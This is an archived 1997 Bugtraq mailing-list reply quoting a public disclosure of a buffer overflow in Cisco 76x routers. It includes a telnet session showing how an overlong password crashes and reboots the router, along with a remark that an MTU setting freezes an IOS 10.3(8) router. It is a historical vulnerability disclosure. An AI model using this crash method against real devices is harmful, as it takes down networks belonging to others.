OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 4th quarter (Oct-Dec) 1997: Re: cisco 76x buffer overflow

Re: cisco 76x buffer overflow

ralfUNI-KOBLENZ.DE
Thu, 11 Dec 1997 09:19:09 +0100 

On Thu, Dec 11, 1997 at 01:11:13AM -0500, Laslo Orto wrote:

> I dont know of anybody ever posting anything on this sbuject, so i'll go
> ahed. I found a buffer overflow in the cisco 76x
> series router. The bug exists only in the 4 users limit software, i couldnt
> reproduce it with the unlimited version.
> When i reported the bug to cisco i promised them that i'll post this info to
> public if they dont fix it withing a week.
> It was over a month ago, and i was never notified of any fix so i'm asuming
> they didnt make any fix. I also cant find any
> mentioning of this bug on their web site by searching for the bug id.
> The exploit is prety simple:
> telnet cisco762.domain.com
> Trying 1.2.3.4...
> Connected to 1.2.3.4.
> Escape character is '^]'.
> Enter Password:Enter a
> veryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
> yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
> yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
> yyyyyyyyyyyyyyyyyyyyyyyyyyyy long string here
> and watch the prety lights go on as the cisco reboots, or imagine your
> victim tearing his hair out.

IOS has proably a pound more of them.  While not exploitable from
outside I can crash my CISCO 1005 running IOS 10.3(8) by setting the
MTU to 15kb.  A couple of seconds later the box will freeze.  Just to
show how tested the thing is ...

IOS is probably not as badly affected as other operating systems because
few people outside of CISCO have the required knowledge about the OS
internals, so writing a useable exploit is hard.

  Ralf